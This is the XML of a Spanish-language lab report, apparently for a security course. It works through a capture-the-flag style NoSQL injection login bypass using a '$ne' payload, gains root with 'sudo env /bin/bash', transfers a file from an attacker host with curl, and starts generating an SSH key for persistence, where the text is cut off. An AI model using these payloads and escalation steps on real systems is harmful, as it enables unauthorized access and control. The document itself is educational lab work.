      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:5000/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se identificó una API que autentica usuarios contra una base de datos NoSQL (MongoDB) mediante solicitudes POST en formato JSON a la ruta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dado que las consultas en bases de datos orientadas a documentos evalúan objetos JSON como filtros directos, el envío de operadores lógicos de MongoDB permite eludir la validación si la aplicación no sanitiza los tipos de datos. Al inyectar el operador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$ne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">not equal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) con valor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la consulta verifica que el usuario y la contraseña simplemente existan y no sean nulos, resultando en una condición lógica siempre verdadera (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_9cad5a629c3006c0b56062c6ee3e7afca573d40"/>
      <w:r>
        <w:t xml:space="preserve">Petición HTTP Interceptada (Burp Suite / cURL):</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /login HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 127.0.0.1:5000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 83</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "username": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$ne": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "password": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$ne": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_4f38d58e030164ec421a289b2c3aa9213d165dc"/>
      <w:r>
        <w:t xml:space="preserve">Respuesta del Servidor:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.0 200 OK</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 98</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Server: Werkzeug/2.0.2 Python/3.10.12</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: Mon, 05 Oct 2026 04:12:38 GMT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "flag": "CETI{NOSQLi_P0rt_F0rw4rd_M4st3r}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "message": "Autenticacion Correcta",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "success"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bandera Obtenida:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CETI{NOSQLi_P0rt_F0rw4rd_M4st3r}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3333750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidencia 01: Petición y Respuesta NoSQLi con Flag" title="" id="17" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="docs/assets/practica1_nosqli/01_nosqli_flag.png" id="18" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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Evidencia 01: Petición y Respuesta NoSQLi con Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_a0da83ca3bc909fe17a37302f4f7744c45e4f1e"/>
      <w:r>
        <w:t xml:space="preserve">3. Práctica 2: Escalada Básica de Privilegios y Transferencia de Archivos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_a3df71dae5139b0cab0ad52998e185b091c43ad"/>
      <w:r>
        <w:t xml:space="preserve">3.1 Enumeración de Privilegios Sudo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez dentro de la sesión de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">developer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se auditó la configuración de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecutando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Matching Defaults entries for developer on cetipracticas:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    env_reset, mail_badpass,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    use_pty</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User developer may run the following commands on cetipracticas:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (ALL) NOPASSWD: /usr/bin/awk</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (ALL) NOPASSWD: /usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (ALL) NOPASSWD: /usr/bin/python3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (ALL) NOPASSWD: /usr/bin/vim</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (ALL) NOPASSWD: /usr/bin/env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_a6f6fe1075fad80ee3586d9fce38b8af7351a93"/>
      <w:r>
        <w:t xml:space="preserve">3.2 Escalada Inmediata mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/env</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El binario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecuta un comando en un entorno modificado. Al estar autorizado con privilegios de superusuario sin contraseña (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NOPASSWD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), permite invocar directamente un intérprete de comandos con UID 0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">developer@cetipracticas:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo env /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@cetipracticas:/home/developer#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@cetipracticas:/home/developer#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_15a3dd2a40c987e6f80bc99953eea8abc793b0b"/>
      <w:r>
        <w:t xml:space="preserve">3.3 Transferencia Bidireccional de Archivos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para desplegar herramientas adicionales o exfiltrar información entre el anfitrión atacante y el servidor comprometido:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. En Kali Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), se levantó un servidor web liviano:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash    python3 -m http.server 8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Desde la máquina objetivo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), se descargó el artefacto requerido mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash    curl http://192.168.1.4:8000/file.txt --output file.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Se comprobó la descarga exitosa en los registros del servidor HTTP y la creación del archivo de salida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3333750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidencia 02: Escalada con sudo env y Transferencia de Archivos" title="" id="24" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="docs/assets/practica2_privesc_files/01_privesc_files.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Evidencia 02: Escalada con sudo env y Transferencia de Archivos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_370fab9b644c588de7d11edf459a4694f18cd2a"/>
      <w:r>
        <w:t xml:space="preserve">4. Práctica 3: Persistencia, Gestión de Identidades y Criptografía SSH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_4b448d3fa951e5a61eb03292e7672fff896fe8c"/>
      <w:r>
        <w:t xml:space="preserve">4.1 Criptografía y Comparativa de Algoritmos (Ed25519 vs. RSA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la administración moderna de infraestructura y auditorías de seguridad, la elección del algoritmo de firma para llaves SSH es crítica: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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RSA (3072/4096 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ed25519 (EdDSA sobre Curve25519)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Longitud de Llave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Extensa (3072 a 4096 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Muy compacta (256 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Rendimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mayor consumo en generación y firma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Extremadamente rápida y constante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Seguridad / Resistencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Susceptible a ataques de canal lateral si no se implementa con precisión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diseñada específicamente contra ataques de tiempo y canal lateral</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Compatibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Universal (sistemas legados)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estándar en OpenSSH &gt;= 6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la máquina atacante se generó un par de llaves Ed25519 para persistencia:</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-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.ssh/llave_p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
